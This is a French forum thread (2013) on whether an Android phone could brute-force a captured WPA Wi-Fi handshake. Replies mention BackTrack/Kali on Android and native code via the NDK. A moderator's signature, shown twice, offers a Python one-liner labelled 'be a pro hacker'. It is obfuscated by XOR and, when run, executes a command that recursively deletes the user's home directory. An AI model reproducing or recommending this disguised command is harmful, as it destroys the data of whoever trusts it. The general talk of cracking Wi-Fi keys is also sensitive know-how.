Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 08-08-2013 00:25:09

Didien
N00b

Bruteforcer le handshake depuis un appareil Android?

Bonjour,

Premier topic, première question qui me turlupine depuis un moment.

Je possède un HTC One (sous rom custom cyanogen 10.1, si ça peut aider) qui est plutôt costaud niveau puissance de calcul. Il est en faite plus puissant que mon ordinateur portable, qui possède une carte compatible pour le monitoring.

Quand j'ai vu la lenteur des clés testées sur mon ordi (400-500 clés/seconde, argh) je me suis demandé s'il y avait moyen de faire mieux. Tout ce qui est exploitation du GPU c'est mort car la carte graphique est naze (recuite 3/4 fois pour la ranimer) et rien à faire au niveau du proco, qui est un double coeur à 2gHz.
J'ai donc regardé mon téléphone et j'ai réalisé que j'ai une bête entre les mains. Et s'il suffisait de capturer le handshake sur mon ordinateur, de le passer à mon smartphone pour qu'il le bruteforce?
Mais j'ai beau chercher, je ne trouve pas de solution. Je commence mes études d'info d'ici peu, mais entre temps je ne saurais coder une telle appli.

Il faudrait qu'elle puisse exploiter les 4 coeurs et le gpu du smartphone pour en tirer meilleur parti, tout en arrivant à traiter des dico conséquents. Est ce que quelqu'un a entendu parler d'une telle appli? Ou quelqu'un a la foi de se lancer là dedans? Si oui, j'espère pouvoir apporter mon aide dès que possible.

Je sais bien que ça n'arrivera pas à la cheville des bécanes qui se font en ce moment en terme de vitesse, mais le concept de rendre mobile le pentest au niveau du calcul de la clé peut être intéressant. Et peut être même la capture du handshake si on arrive un jour à passer la puce en mode monitor, mais là je délire.

Merci.

Dernière modification par Didien (08-08-2013 00:28:49)

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 08-08-2013 09:14:09

Furyo
Membre Irremplaçable
Site Web

Re : Bruteforcer le handshake depuis un appareil Android?

Bienvenue sur le forum wink

Je veux pas dire de connerie mais backtrack 5 était installable sur un telephone android wink

http://tuxme.net/index.php/backtrack-5-sur-android/

En cherchant, Kali doit egalement pouvoir s'installer dessus wink

Donc tu bootes dessus et tu compares la vitesse de calcul avec ton tel et ton notebook wink

Dernière modification par Furyo (08-08-2013 09:15:05)

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#3 08-08-2013 18:02:46

supperdd
Membre

salut et pour la capture il "suffit" d'un adaptateur µsb > USB et d'une clef wifi compatible monitoring et quelques soft
http://pwnieexpress.com/products/pwnpad

#4 09-08-2013 07:41:01

spawn
Modérateur

Ton téléphone est tout à fait capable de faire ça.
Tu n'as pas besoin de backtrack juste pour ça.
Ni même de la suite aircrack.
C'est juste une boucle à faire tourner, il existe peut être déjà du code pour ça. (Il faut que tu saches coder ET compiler pour ton téléphone par contre smile )

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#5 09-08-2013 14:35:07

flatounet
Membre V.I.P.

pour debdroid tu ne le trouvera pas sur le moteur de recherche ( tout les liens sont mort )
va là : http://gitbrew.org/~dasmoover/android/debdroid/
dossier des fichiers hebergé , car les liens de la pages sont mort.

le reste pas de probleme

pour ma part impossible de trouvé "vncpasswd"
si l'un à un lien fonctionel ou mail avec l'archive sera le bienvenue.
cependant j'ai trouvé ca : http://www.tightvnc.com/download/1.3.10 … rc.tar.bz2

pas essayé

Dernière modification par flatounet (09-08-2013 14:38:48)

#6 09-08-2013 14:50:56

jlf
Membre Indétronable

via un smartphone sa doit mettre un temps de dingue a brute forcé ?

Dernière modification par jlf (09-08-2013 14:51:10)

#7 14-08-2013 11:19:30

Didien
N00b

Merci pour vos réponses!

Il suffit d'être riche pour faire ce que l'on veut, c'est sûr !

Non je ne sais pas encore coder/compiler correctement, mais ça viendra!
Oui voilà, je me suis dit que si on installe backtrack sur le smartphone ça va déjà pomper des ressources qui ne seront pas dispo pour le traitement. De plus j'avais déjà tenté une installation avec je ne sais plus quelle appli, mais ça ne marchait pas car mon kernel ne supporte pas (encore) les loopbacks (par contre je n'ai aucune idée de ce que c'est). L'idéal serait d'avoir une application qu'on peut lancer directement depuis android.
Mais si je ne dis pas de bêtises, les applis sont en java, non? Donc on perd de la puissance.

Donc en bref, il n'y a pas encore d'avancées dans ce domaine?

#8 14-08-2013 13:08:05

spawn
Modérateur

Installer backtrack pour péter un handshake c'est overkill.
Un apk, ("application") est un bout de java lancé par android dans sa VM.

http://developer.android.com/tools/sdk/ndk/index.html
http://en.wikipedia.org/wiki/Android_so … opment_kit

developer.android.com a écrit :

The NDK is a toolset that allows you to implement parts of your app using native-code languages such as C and C++. For certain types of apps, this can be helpful so you can reuse existing code libraries written in these languages, but most apps do not need the Android NDK.

Le fait de coder en natif (dépendant du processeur) fait que tu dois recompiler pour chaque modèle (ou presque) de téléphone, alors qu'un .apk sera lancé dans java qui est le même partout.
Mais c'est plus rapide (natif quoi.)

Lien utile :http://kevinboone.net/android_native.html

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#9 14-08-2013 20:54:07

Didien
N00b

Ah je vois, c'est exactement ce que je cherchais, à executer l'application en natif.
Je me renseignerai donc sur comment compiler et vais essayer de faire quelque chose de plus ou moins potable.
Merci bien smile

Annonce